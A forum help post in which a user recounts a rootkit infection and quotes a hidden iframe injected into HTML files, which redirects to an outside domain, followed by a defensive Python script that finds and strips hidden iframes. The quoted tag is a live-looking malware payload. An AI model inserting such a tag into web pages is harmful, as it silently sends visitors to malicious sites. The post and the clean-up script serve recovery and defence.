Okay, long story short: about 2 months ago my computer suffered a large virus attack from a rootkit virus thingy, which AVG 8, however, couldn't detect (as updating from the FREE 7.5 copy to 8.0 removes the required features, and there weren't any prompts). Then, using a multitude of AV software on a Windows-based boot disk and ClamAV from Ubuntu, some of the viruses were removed, but not all.
The above steps then made the system unusable under Windows, so from an Ubuntu live CD I backed up everything to DVDs, CDs and a spare 80GB HDD. All executable (exe, bat) files were removed, and the only files going to the HDD were audio, video and a number of documents.
I removed all attached devices after using the shred command in Ubuntu to write over all of the space on the drive 3 times, which took 2.5 days, then installed Windows XP. Then, using a disc created in Ubuntu, I tried to install Avira AV, but couldn't as I hadn't installed the network card's drivers, so I used Comodo instead. Once installed, I set it to scan: no viruses found, perfect! I then installed Avira AV and again, on the newly installed OS, nothing.
A couple of days later I realised I needed some files off the ext HDD, so I plugged it in and ran the Avira and Comodo AVs on it. Comodo found nothing, but Avira found 6 errors. All were htm hacks trying to redirect using the following code:
Code:
<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
Manually I edited all of these files and removed them, and again ran all AV checks: nothing found, perfect...
Just to be sure, I used the Windows search tool to locate all htm, php and html files. By doing this I found another 10 files which contained the code but weren't found by any of the AVs!
Now here are the questions:
1) Are there any other file formats this code can attach to?
2) Is there any automated tool to go through these files and automatically remove the code, or anything I instruct it to remove?
3) Have I made a wise decision in changing from CPU-hungry AVG Free to Comodo (set to On Demand scan) and Avira as the main real-time scanner?
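
An added example, not part of the original post: a Python script for the kind of automated clean-up question 2 asks about. It walks a folder for htm, html and php files, reports iframes that are hidden from the viewer (display:none, visibility:hidden, or zero width/height), and rewrites a file only when asked, keeping a .bak copy. The function names and the domain malicious.example are made up for illustration.

```python
import re
import shutil
import sys
from pathlib import Path

# File types the post found carrying the injected tag.
WEB_EXTENSIONS = {".htm", ".html", ".php"}
# Constructed sample (placeholder domain), shaped like the tag quoted in the post.
SAMPLE = b'<p>hi</p><iframe src="http://malicious.example/rc/" style="display:none"></iframe>'
# A whole iframe element; group 1 holds the attributes of the opening tag.
IFRAME_RE = re.compile(rb"<iframe\b([^>]*)>.*?</iframe\s*>", re.I | re.S)
# Styling that makes a frame invisible to the person viewing the page.
HIDDEN_RE = re.compile(
    rb"display\s*:\s*none|visibility\s*:\s*hidden"
    rb"|\b(?:width|height)\s*[=:]\s*[\"']?\s*0(?![\d.])", re.I)

def strip_hidden_iframes(data):
    """Return (cleaned bytes, list of removed tags); visible iframes are kept."""
    removed = []
    def repl(match):
        if HIDDEN_RE.search(match.group(1)):
            removed.append(match.group(0))
            return b""
        return match.group(0)
    return IFRAME_RE.sub(repl, data), removed

def clean_tree(root, dry_run=True):
    """Scan root recursively and return {path: [hidden iframe tags found]}.

    With dry_run=False each affected file is first copied to <name>.bak
    (kept for review; delete it once checked) and then rewritten.
    """
    report = {}
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in WEB_EXTENSIONS:
            continue
        cleaned, removed = strip_hidden_iframes(path.read_bytes())
        if removed:
            report[str(path)] = removed
            if not dry_run:
                shutil.copy2(path, path.with_name(path.name + ".bak"))
                path.write_bytes(cleaned)
    return report

if __name__ == "__main__":
    # Report only; call clean_tree(folder, dry_run=False) after reviewing the list.
    for name, tags in clean_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(name, len(tags), "hidden iframe(s)")
```

Run it in report mode first and read the listed tags before letting it modify anything, since a page may use a hidden iframe legitimately.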